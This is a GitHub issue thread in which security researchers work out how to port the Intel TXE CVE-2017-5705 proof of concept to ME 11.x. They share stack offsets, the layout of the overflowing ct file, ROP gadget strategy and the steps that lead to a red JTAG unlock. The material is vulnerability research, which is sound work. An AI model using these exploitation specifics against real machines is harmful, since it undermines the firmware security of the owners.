Porting to ME - Githubissues

unix0825 commented 5 years ago

I am trying to port this POC to ME. The ME version which I'm testing is 11.0.0.1202.(This is vulnerable version according to CVE-2017-5705 detail) I made a ct file(big ct file to make buffer overflow and to hang somewhere) and merged it into original ME firmware using FIT. (also changed OEM public key hash to 00 00..)

The problem is that when I boot up a laptop with the ct file merged, the laptop boots up normally without any fail. It looks like the ct file is not loaded at all during the boot process. Do I need some additional setting in FIT to make ME to load ct file?

kakaroto commented 5 years ago

I was just about to create a new issue asking for advice in porting to ME 11 and saw your issue, so I'm going to ask my question here. I'm targeting ME 11.0.0.1180 though, but it should be very similar.

@unix0825 yes, you are missing quite a lot of steps. I've been working on this for a long time, and you'll see what you're missing as I explain what I've done and how I can't get it to work yet. In your case, you probably can't use the FIT tool for that and you'd have to modify the MFS partition manually. I just tried with FIT and I get [FitActions] Unable to load Token. File does not appear to be a valid/supported token, so I'm unsure how you got it to merge the file.

@h0t I've reversed pretty much the entire bup_init_trace_hub part with how the code that loads chunks from MFS, as well as part of the bup_init_storage. I also wrote an MFS utility to manipulate MFS files so I can do what I need to do. I can get the crash, but I can't get the ROPs to work, and I'm not sure why or how to debug further than what I've done so far already, and I've re-re-reviewed every offset and every code path that I can think of. The only possibility that I see is if bup_mfs_read_chunks is also using the syscall_context but I've drilled down into it and I can't find anywhere where it accesses that context.

So here's what I've accomplished :

Found the CT data offset in the stack to be 0x384 on the ME instead of 0x380 in TXE.
Stack offset is 0x5D000 instead of 0x56000 (for ME 11.0.0.1180)
My target address (the memcpy return address) is at offset 0x984 from the stack (0x5C67C)
I set the syslib context address to be 0x90 bytes (0x68 + 0x28) before my syslib data in the ct file, and the data I have is <address to shmem descriptors><number of descriptors>. I haven't found anything else from syslib_ctx to be used other than the pointer at offset 0x90 and the count at 0x94.
On TXE, the shmem block index is 2, but it could be different on ME, so I've set all the shmem descriptors to contain the same data and I've created 20 of them just to be sure.
The shmem are 0x14 in size with data <0x11, TARGET_ADDRESS - 0x384, 0x384 + 0x40, 0, 0>. The last chunk that gets read from flash will be at offset 0x384 in my resulting CT file (which will then have size 0x384 + 0x40) and will contain the ROPs. I've tried shifting the data to different offsets, but it doesn't look like my target address is off. At least, not within + or - 0x20 bytes from what I calculated with static analysis.
I found the proper ROPs but for now for testing, I'm just doing the following two ROPs : <DCI_ENABLE, INFINITE_LOOP>. If the ROP gets executed, then it should call the DCI enable function and enter an infinite loop. I can't get the DCI to enable which tells me that the ROPs are not working (if I do enable DCI using the PCH strap, it does work so it's not a hardware setup issue). I've also tried having DCI enabled via strap and using the ROP to disable it, that doesn't work either (it stays enabled).
I've made sure the fitc.cfg : /home/mca/eom contains 0x00
I've made sure the home partition (iFile = 8) is not in MFS to prevent the alternate path in reading the file.
I made sure the /home/bup/ct file ends on a chunk boundary, so that the first 4 bytes appear at position 0x3C on a chunk, then the remaining 0x380 bytes are on their own chunks, then the additional 0x40 bytes containing the ROPs appear as a separate chunk that gets loaded after the 0x384 bytes of /bup/ct are loaded (== after syslib_ctx is overwritten).
I made sure the /bup/ct chunks do not appear in order so the BUP module can't optimize the loading of multiple chunks at the same time and defeating the purpose of the read_chunk+memcpy happening after sysctx is overwritten.

I checked the MFS partition manually in a hex editor to confirm the chunks' order being non sequential and that the ROPs appear on their own chunk, and confirmed that there is no crash if the /bup/ct filesize is less than 808 (and contains zeroes, it does crash trying to set the 0xB7/0xBF segments if I fill it with random data), so my MFS tool is working as it should. I also confirmed all of the correct offsets and contents for the TLS structure, the syslib context, the shmem descriptors and the ROPs.

I don't know what I'm missing, so if you have any advice/hints to give, I'd appreciate it.

Thanks!

unix0825 commented 5 years ago

@kakaroto I was not using unlock token when I did the experiment . I just wanted to make it crash and hang somewhere for just test so I only used the ct file. In that situation I didn't get any error message in FIT (I checked that if I use both ct file and some wrong unlock token to merge it with FIT, I can get "[FitActions] Unable to load Token. File does not appear to be a valid/supported token" as you said). And when I did my experiment with only the ct file(not using unlock token), I also used stack offset 0x5D000 and made some ROPs to hang somewhere(I also corrected all offsets in shellcode that I needed for ME 11.0.0.1202) and the difference from your method was that I used syslib_tracer to escape stack guard similar to TXE POC. But as I said, even the crash not happened(Of course my ct file also bigger than 808bytes). Do I need the unlock token to make ME load ct file? If I should use the unlock token, could you explain how to make it?

Thank you for always!

kakaroto commented 5 years ago

@unix0825 ah, it was in Flash Layout, my bad. I confused it with the unlock token. I tried then checked the ct file it added and it has the right size, so it should work. I was just about to say that you can't use the syslib_tracer because ME 11 doesn't use it in bup_init_trace_hub, which is why I tried to reproduce the exploit with the memcpy, but before I replied, I decided to check a newer ME (11.6.0.1126) and it does indeed use syslib_tracer, so I wouldn't need to mess with the memcpy. I went backward and checked your version 11.0.0.1202 and it does also use the syslib_tracer, only 11.0.0.1180 did't... I was really unlucky to have started with the version that didn't and I thought the syslib_tracer code was only used in TXE, not ME11 🤦‍♂.

That should make a lot of this much easier! Thanks for your help! Hopefully that unlocks where I've been stuck and I can help you back (if PT team doesn't respond by then).Once I have JTAG, I should be able to figure out why the memcpy method wasn't working.

For your issue with it not crashing, check if the motherboard doesn't have two BIOS chips. I've had that before on a machine when I was testing, as it crashes during load, the MB will automatically switch to the "known working" BIOS image instead. So after it boots, try to dump the flash, see if it restored to a different version or if the file hash still matches. Also try flashing it completely with random data (or just erase it) to see if the PC still boots from a different image.

Thanks!

h0t commented 5 years ago

Hi @unix0825 and @kakaroto

Do I need the unlock token to make ME load ct file?

No, you don't need the unlock token on ME11 (not TXE).

For your issue with it not crashing, check if the motherboard doesn't have two BIOS chips.

On the gigabyte mainboard I had to turned off DUAL-BIOS, because as the watchdog constantly reboots the system.

markel777 commented 5 years ago

Hi @kakaroto

That should make a lot of this much easier!

Please be aware that the method of doing arbitrary write leveraging syslib_tracer_ctx which we used in TXE allows controlling only four bits to be written to controlled address. We used that to change return address from bup_update_sys_tracer. However, being able to change only four bits from the original ret addr, we very hardly found only one ROP gadget which we were allowed to call that also moves stack pointer to controlled area (we only control the part of bup_init_trace_hub stack frame). Whether same or similar ROP gadget exists in a ME firmware (used by you or another vulnerable to the stack overflow) is a very good question-

kakaroto commented 5 years ago

Hi @markel777 Looks like I wrote the below comment 2 weeks ago (right after my previous comment) and just found it unsubmitted in one of my chrome tabs.

=====

Turns out I was and idiot and the ME version I had checked its offsets/values 10 times was a different version from the one I was testing on hardware with, all because of a typo I did in the file I loaded the first time into IDA a few months ago. With trying to switch to a newer ME version to try the systracer method as suggested here, I realized my mistake!

Anyways, looks like my ROPs are working now (using the memcpy method, not systracer), and I can set red unlock.. now to figure out what to change in OpenIPC's XML files for it to see the ME core and its devices. I expected a "unknown id code on chain" but it doesn't seem to say that so it probably won't work until I add it to the xml.

I tried using DAL and added the xml snippet provided in the slides from CCC, but it didn't work. I can see in a screenshot that you had the PARCSMEA under RNGTOP, but as you can see in the screenshot, I have RNGLIB but no RNGTOP. This is on a skylake device, 100 series PCH-LP and it seems RNGTOP is only for PCH-H. I'll try a newer DAL to see if it makes any difference, otherwise I'll dig into the openIPC xml files to understand them.

Thanks for the help!

======

So, yes, I know how the syslib_tracer_ctx works and the 4 bits it can modify and I was also worried if I could find a proper ROP with that. But as soon as I realized my mistake in using the wrong file and fixed the offsets to match the version I was testing with, the memcpy exploit worked as expected, so that's not an issue anymore.

My main concern now is to make the ME core appear in OpenIPC. I've fiddled a bit with the XML files. I think I understand most of how they work, but since SKL/KBL doesn't give us any of the topology, it's unable to find the device. I added the LMT2 device but it doesn't work, I still need to do some more tests, I tried using CoreGroup CSME and DeviceType SPT_CSME_LMT but it didn't help, and I tried setting it to LMT2 and it did show up as LMT2 once, but I couldn't reproduce it afterwards and even though it appeared as an LMT2 device, I believe doing the .idcode() call on the device returned 0.

I'm still at the stage where I'm exploring how to make OpenIPC XML work the way I want it to and I'm trying to find a way to tell JTAG to give me the entire chain topology and idcodes but I can't seem to be able to do that. So there's definitely some progress.

peterbjornx commented 5 years ago

For me the memcpy mode of attack did require quite some tweaking, in my case I could only get it working by fragmenting the ct file as having it be contiguous in flash meant that the entire file would be read at once: no second call to mg_copyto. Does it also do that on real hardware? I was testing against an emulated SPT firmware. As to OpenIPC, I pretty quickly decided to drop those experiments as DAL already has support for the platform at least.

peterbjornx commented 5 years ago

Nevermind, did not see your earlier message about chunk order. Glad to see that my findings on the emulator match real world results :). Also, how did you get FIT to leave eom clear? I never managed to get it to do that and had to rebuild my image with my own tool to do so.

kakaroto commented 5 years ago

I never tried (or thought I could try) emulating the ME. I only saw in the asm code that it would optimize the reads and read up to 10 chunks at the same time if they were contiguous, so I made it add the ct file in reverse order. I didn't test without it but I'd expect it wouldn't have worked otherwise. I tried DAL as well but it didn't seem to work either (couldn't see the LMT2 in the hardware list in ConfigConsole). I haven't used DAL at all other than running the ConfigConsole for testing early on, but if it works with that, I might need to switch. Thanks!

As for FIT, I didn't use it at all. I wrote my own MFS utility, but the image I had already had a eom file clear so it wasn't even an issue.

unix0825 commented 5 years ago

Hi @markel777, @h0t and @kakaroto

Please be aware that the method of doing arbitrary write leveraging syslib_tracer_ctx which we used in TXE allows controlling only four bits to be written to controlled address. We used that to change return address from bup_update_sys_tracer. However, being able to change only four bits from the original ret addr, we very hardly found only one ROP gadget which we were allowed to call that also moves stack pointer to controlled area (we only control the part of bup_init_trace_hub stack frame). Whether same or similar ROP gadget exists in a ME firmware (used by you or another vulnerable to the stack overflow) is a very good question-

Yes. I think I found ROP gadgets which allows to move stack pointer to controlled area in ME, so I'm using the bup_update_sys_tracer like TXE POC. But I still have the problem with that the system is not crashing with my ct_file(shellcode).

For your issue with it not crashing, check if the motherboard doesn't have two BIOS chips. I've had that before on a machine when I was testing, as it crashes during load, the MB will automatically switch to the "known working" BIOS image instead. So after it boots, try to dump the flash, see if it restored to a different version or if the file hash still matches. Also try flashing it completely with random data (or just erase it) to see if the PC still boots from a different image.

I checked if my laptop have two BIOS chip, but I can find only one BIOS chip in there. I'm using FIT(Flash Layout -> Intel ME Region -> Intel Trace Hub Binary) to merge my ct_file for crashing the system. I did not have any problems or error messages to build image with the ct_file in FIT. But the system still boots up well and not crashed. It should not booted well even though my offset calculation was wrong in my ct_file, because the ct_file size is bigger than 808 bytes. I also checked that after it booted well, I dumped flash again and checked if my ct_file somehow changed to original normal ct_file, but it still had my ct_file without any change. So it should work I think. So, my question is, was it wrong for me to merge ct_file with FIT for ME?

kakaroto commented 4 years ago

Good news, I finally got it! Unfortunately there wasn't a way to scan or probe for devices so I had to generate an xml with all possible device paths in the jtag chain and clear out those with an invalid idcode then did an irdrscan 0x2 on valid TAP devices until I found the processor id of the LMT device. In the end, it works :) Thanks for all the help I got from here!

After I'm done with the rest of my ROPs to get the main CPU booting, I'll release everything with a blog post on the whole process, in the meantime, you get to see the important offsets in that screenshot for those who need them :)

h0t commented 4 years ago

Hi @kakaroto, I congratulation you! Good job!

unix0825 commented 4 years ago

Hi @kakaroto, Congratulation!! I'm really looking forward to your blog!!

kakaroto commented 4 years ago

Thanks! it didn't take long to get the main CPU to boot.

I do see a weird behavior though, once I boot the machine, it works fine (I can log into Ubuntu), but OpenIPC doesn't let me halt the CSE thread anymore, with error Timeout occurred while waiting for threads to halt with 0 retries (this is when booting the machine after I launched ipccli). If I do a ipc.forcereconfig(), instead I get : Path 'tap.tapstatus.pm_in_progress' does not correspond to a valid state node on device 0x00001001 and if I stop my python process and try again, I get Unable to perform operation, because OpenRC does not support core group GPC. Rebooting the machine doesn't work, the exploit doesn't even seem to happen anymore (scanning the aggregator personality register gives 0) and the machine doesn't boot. At least that's fixed by enabling the HAP bit. Other side effect of enabling HAP, now I can halt the CSE thread after the machine boot (as long as I open OpenIPC before booting the machine and that I don't call ipc.forcereconfig()). Either way, now I have JTAG working with the CPU booted, I just need to figure out the XML config to get JTAG to work for both the main CPU and the ME core at the same time :)

P.S: I also got it working on a Z270 kabylake system with ME 11.6.

kakaroto commented 4 years ago

I have released my findings and port to ME 11.x which you can read here : https://kakaroto.homelinux.net/2019/11/exploiting-intels-management-engine-part-2-enabling-red-jtag-unlock-on-intel-me-11-x-intel-sa-00086/

I believe this issue can be closed now.

unix0825 commented 4 years ago

Oh. That is great work!

Now I would figure out what was my problem.

Thank you so much!

2019년 11월 14일 (목) 오후 6:54, Youness Alaoui notifications@github.com님이 작성:

I have released my findings and port to ME 11.x which you can read here : https://kakaroto.homelinux.net/2019/11/exploiting-intels-management-engine-part-2-enabling-red-jtag-unlock-on-intel-me-11-x-intel-sa-00086/

I believe this issue can be closed now.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/ptresearch/IntelTXE-PoC/issues/17?email_source=notifications&email_token=AMT4YOTKOIWDZISOSAZVQ4DQTUN6LA5CNFSM4IGK2FB2YY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOEEBIFFI#issuecomment-553812629, or unsubscribe https://github.com/notifications/unsubscribe-auth/AMT4YOWMHPMI34ZBHJ6GYH3QTUN6LANCNFSM4IGK2FBQ .

ptresearch / IntelTXE-PoC

Porting to ME #17